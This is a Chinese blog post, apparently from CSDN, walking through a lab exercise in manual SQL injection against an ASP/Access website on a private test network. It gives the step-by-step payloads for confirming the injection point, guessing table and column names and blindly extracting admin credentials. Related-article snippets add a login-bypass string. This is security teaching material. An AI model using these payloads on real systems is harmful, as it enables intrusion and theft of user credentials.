SQL注入原理-手工注入access数据库

最新推荐文章于 2023-10-01 21:29:19 发布
最新推荐文章于 2023-10-01 21:29:19 发布
阅读量275 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43679940/article/details/84105947
版权

分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow

也欢迎大家转载本篇文章。分享知识,造福人民,实现我们中华民族伟大复兴!

                       

一、Target
SQL注入原理、学习手工注入过程
二、实验原理:通过把SQL命令插入到web表单提交或输入域名或页面请求的的查询字符串,最终达到欺骗服务器执行恶意的SQL命令

1、在结尾的链接中依次添加【’】和【and 1=1】和【and 1=2】判断网站是否存在注入点
2、添加语句【and exists(select*from admin)】根据页面返回结果来猜解表名
3、添加【and exists(select admin from admin)】猜解admin表中的列名admin
4、添加语句【and (select top 1 len (admin)from admin)>1】猜解字段长度
5、添加【and (select top 1 asc(mid(admin,1,1))from admin)>97】猜解字段中字符的ASCII码
通过上述的步骤,反复猜解,即可得到数据库存储的用户名和密码
三、实验环境:
本机:192.168.1.2
目标机:192.168.1.3
四、实验步骤:
找到有注入漏洞目标网站:
**1、目标站点:http://192.168.1.3:8008
随便选择一个链接:http://192.168.1.3:8008/onews.asp?id=45**
这里写图片描述
2、测试链接,在末尾添加【’】
这里写图片描述
3、在末尾添加【and 1 =1】
这里写图片描述
4、在末尾添加【and 1 =2】,返回页面发现该网站存在注入漏洞
这里写图片描述
猜解表名
在链接末尾添加语句【and exists(select*from admin)】,页面正常显示,说明存在表名【admin】
这里写图片描述
猜解列名
1、在链接末尾添加语句【and exists(select admin from admin)】,页面显示正常,说明表中存在admin列
这里写图片描述
2、在链接末尾添加语句【and exists(select password from admin)】,页面显示正常,说明表中存在列password
这里写图片描述
猜解字段内容
1、在链接末尾,输入【and (select top 1 len (admin)from admin>1】页面显示正常,数字依次加1,进行测试,例如:【and (select top 1 len (admin)from admin>5】说明字段长度为5
这里写图片描述
2、在链接末尾,输入【and (select top 1 asc(mid(admin,1,1))from admin)>97】,可猜解第一条记录的第一个字符的ASCILL码为97,对应为a.
这里写图片描述
3、同样的方法得到admin的字段内容【admin】,password的字段内容【bfpms】

           

给我老师的人工智能教程打call!http://blog.csdn.net/jiangjunshow
这里写图片描述
漫画树
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入
yfx000的专栏
06-19 426
用户名输入: admin'or'1'='1 密码输入: admin'or'1'='1 系统就能登录 执行sql:   where         and user.USER_NAME='admin'          or '1'='1'          and user.PASSWORD='46b19f09670fe38d482e20cf0bb1db1e'
SQL注入之——ACCESS手工注入
温柔小薛的博客
04-04 698
ACCESS手工注入 目录ACCESS手工注入ACCESS手工注入(上)理论基础爆出数据库类型(需要低版本IE浏览器)猜数据库名猜字段名及字段长度猜字段值ACCESS手工注入(下)SQL 注入中的高级查询——order by 与 union selectunion select 查询攻击测试ACCESS手工偏移注入ACCESS手工跨库查询 ACCESS手工注入(上) Access数据库一般用于流量...
Access SQL语法(查询/插入/删除/连接/修改)
热门推荐
M10150831的博客
12-30 1万+
SQL语法 1. 查询 简单查询 select 班级,姓名,性别 from 学生名单 加筛选条件 select 班级,姓名,性别 from 学生名单 where 性别="女" 分组统计 select 班级,count(1) as 各班女生数 from 学生名单 where 性别="女" group by 班级 2. 插入 插入整张表(若该表已存在,则覆盖) select 班级,姓名,性别 into 1班学生名单 from 学生名单 where 班级="1班" 插入一条记录 ins
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入、SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB数据库)、SQL...
SQL注入Access注入手工
12-14
SQL注入是一种常见的网络安全威胁,主要针对使用SQL语言的数据库系统,如Access和SQL Server。当一个Web应用程序未能充分验证用户输入的数据,攻击者可以利用这一漏洞,在查询语句的末尾添加恶意的SQL代码,从而在...
手工注入常用SQL语句.txt
07-18
对于Access数据库,可以通过以下方式进行手工SQL注入: - `and (select id from MSysAccessObjects) > 0`:该语句用于检测目标系统是否使用Access数据库。 ### 3. MSSQL数据库手工SQL注入示例 MSSQL(Microsoft ...
手工注入常用SQL语句笔记.docx
04-10
手工注入常用 SQL 语句笔记 ...手工注入常用 SQL 语句笔记对 MySQL 和 MSSQL 两种数据库管理系统进行了详细的介绍,涵盖了注入原理、实战心得、判断数据库类型、常用内置函数使用、数据库的扩展存储过程等方面的内容。
#学习笔记#SQL注入原理——手工注入access数据库
cheese0.0的博客
07-30 1029
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面查询的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 当应用程序使用输入内容来构造动态sql语句以访问数据库时,会发生sql注入攻击。如果代码使用存储过程,而这些存储过程作为包含未筛选的用户输入的 字符串来传递,也会发生sql注入SQL注入可以协助攻击者登录数据库执行命令,有些会使账户获得更高的权限对数据库进行操...
SQL注入学习笔记-手工注入access数据库
weixin_30316097的博客
04-28 84
欢迎拜访我的新博客~~ http://blog.xieldy.cn 1. 网络协议安全 1.1SQL注入原理-手工注入access数据库 目标网站特征:以【.asp?id=】结尾的链接。 判断网站是否存在注入点: 在链接结尾添加【'】如果网站数据库报错,则说明可能可以,进行下一步。 在链接结尾添加【and 1=1】如果网站可以正常显示,说明可能存在注入点。 在链接结尾添加【and ...
sql注入基础原理注入方式
A906003660的博客
07-20 1192
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。二、 SQL注入的简单流程第一步:判断目标站点,是否存在注入漏洞向页面传入一些指令(SQL语句,检查指令是否被执行,如果被执行,说明页面是可能存在SQL注入漏洞的;如果不能被执行,说明可能不存在SQL注入漏洞常用的闭合点: ''单引号""双引号第二步判断数据表的字段数量思路: order by字段编号。
【网络安全-SQL注入(3)】SQL注入----一篇文章教你access数据库SQL注入以及注入点利用
最新发布
m0_67844671的博客
10-01 1085
本篇文章以凡诺企业网站管理系统为例,讲解了access数据库是如何进行SQL注入的,以及注入点如何利用,如何判断查询字段个数,如果用联合查询爆出数据库数据等;【网络安全-SQL注入SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】;
Web漏洞-access注入、Sql Sever(Mssql)注入、PostgreSql注入、Orache注入、MongoDB注入、Oracle注入-SQLmap使用教程-附实例
ran的博客
01-15 1805
Mongodb的查询文档方式与其他的数据库略微不同,当进行条件查询的时候,mysql是用where,而mongodb是以键值对形式(类似于JSON)进行查询的。这里是一个跟Mysql数据库的一个不同的位置,PostgreSql数据库union select后用。因为access数据库不包含数据库名,所以直接从表名开始查询。最后将password解密后进入后台复制KEY提交即可。”,所以在注入过程中需要我们进行暴力猜解。------>注意与Mysql进行对比。在进行注入时,要注意对。sqlmap使用教程。
SQL注入学习--access
ghoooos的博客
02-03 1291
SQL注入access注入,偏移注入
【漏洞扫描】——13、AWVS安装使用
Fly_鹏程万里
03-01 1051
Acunetix Web Vulnerability Scanner(AWVS)是用于测试和管理Web应用程序安全性的平台,它能够自动扫描互联网或者本地局域网中是否存在漏洞并报告漏洞,适用于任何中小型和大型企业的内联网、外延网和面向客户、雇员、厂商和其它人员的Web网站,AWVS可以通过检查SQL注入攻击漏洞、XSS跨站脚本攻击漏洞等漏洞来审核Web应用程序的安全性,集合了仪表盘、目标、漏洞、扫描、报告设置等功能模块。
【13】WEB渗透基础-[access数据库注入](2)
司徒荆的博客
07-11 356
SQL注入分类[access数据库注入] 此文章中标点符号在页面中显示可能会转成中文的,自己测试时候语句中的标点一律使用英文输入法状态下的。
access手工注入笔记
weixin_34358092的博客
07-23 96
http://www.xxx.com/news.asp?id=6 注入点 判断是否存在注入 两次返回不一样 存在注入 http://www.xxx.com/news.asp?id=6 and 1=1 http://www.xxx.com/news.asp?id=6 and 1=2 判断数据库 这里可能是本地问题 没有测试出来 and (select count(*) from ...
SQL注入漏洞-手工注入
05-21
对于SQL注入漏洞的手工注入,建议使用一些工具来进行测试,如SQLMap、Havij等。这些工具可以通过一些特定的语句来测试目标网站是否存在SQL注入漏洞,并且可以自动化执行攻击,并且提供详细的攻击日志,方便测试人员...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值